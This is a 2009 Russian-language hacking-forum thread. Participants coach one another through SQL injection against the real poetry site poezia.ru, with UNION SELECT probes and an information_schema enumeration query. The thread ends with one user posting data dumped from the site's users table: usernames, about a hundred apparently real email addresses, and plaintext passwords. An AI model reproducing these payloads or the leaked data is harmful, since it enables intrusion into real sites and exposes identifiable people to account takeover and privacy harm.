Сообщений в теме: 11

[oler117]

Здравствуйте!  
Нашел на днях инъекцию на сайте poezia.ru и не могу довести до конца: ]]>http://poezia.ru/art...NION SELECT 1/*]]>.
Во-первых, объясните, как в таблице может быть только 1 поле, если, как минимум, должно быть 3: "Раздел", "Опубликовано" ну и поле с самим произведением. Но когда пытаюсь, что-то типа ]]>http://poezia.ru/art...ON SELECT 1,2(И]]> БОЛЬШЕ)/* - ошибка "The used SELECT statements have a different number of columns".
Во-вторых, почему эта "1" не выводится на странице?

Помогите плиз.

[xUnu]

хм.... скуля там точно есть
ветка - 5
а до какого поля ты крутил?)))
З.ы с чего ты взял что должно быть как минимум 3 поля?)) и 1 и 2 бывает)))

[oler117]

MD6 (25.8.2009, 18:08) писал:

ветка - 5

Что это значит?  

MD6 (25.8.2009, 18:08) писал:

а до какого поля ты крутил?)))

До 25-ого.

MD6 (25.8.2009, 18:08) писал:

с чего ты взял что должно быть как минимум 3 поля?

Потому-что на странице отображаются Раздел(1), Когда опубликовано(2), Само произведение(3) да еще и автор(4). Во как.

[$iD]

Цитата

Что это значит? blush2.gif

MySQL 5 версии он имел ввиду ;)

[oler117]

Понятно...
Так что там, ни у кого не получается?..  

[xUnu]

Попробуй крутить слепую скулю)))
]]>12]]>

[oler117]

Не получается...  

[athellnick]

а там show tables нельзя выполнить?

[aka PSIH]

Цитата

Во-вторых, почему эта "1" не выводится на странице?

а в исходнике не пробывал смотреть?
]]>http://poezia.ru/art...),database())--]]>
u32983@localhost:5.0.27:u32983

[oler117]

aka PSIH, у меня ничего не выводится на это ]]>http://poezia.ru/art...),database())--]]> .

aka PSIH (26.8.2009, 19:34) писал:

u32983@localhost:5.0.27:u32983

Как это можно использовать?

[Cлоны_они_повсюду]

oler117 (27.8.2009, 9:47) писал:

aka PSIH, у меня ничего не выводится на это ]]>http://poezia.ru/art...),database())--]]> .

aka PSIH (26.8.2009, 19:34) писал:

u32983@localhost:5.0.27:u32983

Как это можно использовать?

Тебе же сказали смотреть в исходнике

<a href="article.php?sid=u32983@localhost:5.0.27:u32983">


Запрос
_http://poezia.ru/article.php?sid=48298+and+1=2+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.column
s+limit+1,1000--

Ответ
<a href="article.php?sid=CHARACTER_SETS:MAXLEN">

[xUnu]

Дабы сид не ругался и принял меня в приват ТС"у на твою скулю потратил 2 часа
ЛОгины

Table : users

uname:

a-o:
ablom53:
Ablomov:
abp:
abrakadabrion:
ad140:
Aelkris:
Afuley:
ainova:
aipopov:
airvit:
alchernov:
aldona:
Aleksandr:
aleksvetlana:
alelnik:
alesya shapovalova:
Alex:
alex-kovalev:
alex13:
alex1961:
Alex44:
Alexander:
Alexej:
alexk:
alexsh:
Alik-358:
Aliss:
aljokin:
alpatov:
alter ego:
amelnik:
Amis:
amk59:
andreitmk:
Andrey Korovin:
annaa_2001:
antogen:
apet:
aplar:
arcady:
arkavin:
art-cabare:
atlantis1:
auau1:
aurel:
autumn:
avidan:
avokado:
ayuri:
Azarov:
bagira:
Baranov:
bardodym:
barinova:
bedrinsky:
bogul:
belozer:
boiko:
borisova7530:
bpv1959:
boreiko:
brel1:
brentano:
brig:
bubnov:
budah2001:
buevich:
buka:
cedoi:
chajka:
chebrovat:
Chelly:
Chiba:
chirkova:
cimmeriec:
cnhjywbq:
colt-v:
corala:
cotedazure:
craighunt56987:
cyxux:
Daniel Kogan:
Dashyriya:
dastrov:
daya7:
demetrivs:
demi4eva:
diakonjorgos:
didgei:
dikineb:
diko:
dilyin:
dimsor:
dim_ko:
din:
dixi:
dl9zp:
dmitrismirnov:
dobryn:
DmitriyYakubov:

мыльники

Table : users

email:

lbm@poezia.ru:
arcady@bryazgin.ru:
galinayudin@hotmail.com:
sxolast@yandex.ru:
REZNITSKY@MAIL.RU:
bardodym@inbox.ru:
fasketta@gmail.com:
cyxux@mail.ru:
skorik@optima.com.ua:
s2rge@udin.org:
yulia_bog@inbox.ru:
moderator31@yandex.ru:
talleyrand@yandex.ru:
g.berkovych@rambler.ru:
ulchik40@hotmail.com:
myclone@fromru.com:
vika24@freemail.ru:
mayra_ru@mail.ru:
sergey_msv@mail.ru:
zoom180x@mail.ru:
itroyanovsky@mail.ru:
santalow@mail.ru:
daya7@yandex.ru:
msi@asf.kiev.ua:
t_helena@mail.ru:
alelnik17@rambler.ru:
ad140@mail.ru:
vasil_drobot@yahoo.com:
demi4eva@yandex.ru:
holyspirit38@mail.ru:
medved_san@mail.ru:
ostudin@yandex.ru:
savvala@mail.ru:
yamakowa@yahoo.com:
gershanika@mail.ru:
isayev_2000@yahoo.com:
edel-weiss@mail.ru:
avidan@mail.ru:
oleg.lo@mail.ru:
dolgpeter@gmail.com:
sirius540@rambler.ru:
laraleggatt@yahoo.ie:
alchernov@list.ru:
supermario_san@mail.ru:
mtalkov@yandex.ru:
poljak@rambler.ru:
a-volovik@yandex.ru:
korovin@litafisha.ru:
diakongeomalkov@mail.ru:
graff@nexcom.ru:
victoria_shpak@mail.ru:
severinka_s@mail.ru:
vvaj@mail.ru:
ranetka-net@mail.ru:
mina2002@bk.ru:
penelope_is@hotmail.com:
mag198@mail.ru:
dim_ko2000@mail.ru:
alek-svetlana@yandex.ru:
t_chebotaeva@mail.ru:
aduschin@mail.ru:
eugpol@radio-msu.net:
era-izdat@inbox.ru:
svetalitvak@mail.ru:
Vikset@yandex.ru:
krotkov2001@mail.ru:
nadin_br@tut.by:
alona@takas.lt:
natalex@gmail.com:
imashinski@netzero.net:
iverin@inbox.ru:
sirsit@mail.ru:
bojkot2004@yandex.ru:
en@fromru.com:
lileinaa@mail.ru:
a-o@nm.ru:
le-bo@narod.ru:
alex-kovalev@mail.ru:
zverev@rinet.ru:
ivashnev@gmail.com:
info@poezia.ru:
ivan_bg@mail.ru:
akc842@yandex.ru:
mail@barinova.ru:
alesia_76@mail.ru:
lena478@narod.ru:
irenerussian2006@rambler.ru:
ivsh@ukr.net:
konkurs@poezia.ru:
rusanova_s@mail.ru:
yalisa@mail.ru:
hafonik@rambler.ru:
shmark53@mail.ru:
m.zaslavskaya@gmail.com:
mi-chael@yandex.ru:
kuperschmidt@yandex.ru:
teenage14@mail.ru:
aljokin@yandex.ru:
antonrovner@mail.ru:
felixr@yandex.ru:
chigirin07@mail.ru:

пароли

Table : users

pass:

ydacra:
miros757:
russia:
jandr:
URAN:
exicard:
pulman:
2208:
741:
len:
cogito:
bogulnik:
zapad:
sbsolp13:
ulchik:
8251:
barsik:
ringback:
19660420:
agenda767:
nhjzy:
dtkbvbh:
23576:
gjn:
elf1:
15marta:
140140:
krokro1:
vas:
11rkikuzzu:
rjat:
07121941:
volga:
131313:
33034:
way:
aaa5611:
republic:
������:
gnusmas:
tref:
berloga:
alchernov34:
misha:
razvedka:
RD:
nobody:
ajy:
Rogovo:
taygaa:
dvosna:
09091993:
666666:
������:
zzuzya:
ionov:
1981634:
11431:
rtrrtr:
AnDerS:
74016000:
45911971:
baemist:
sl:
roselein:
carcass:
�������:
soho:
lexamiracle:
im:
sci:
AmiSir:
1977:
ckfdzyrf:
31963:
22222:
levonty:
poetry:
2656166:
3515531: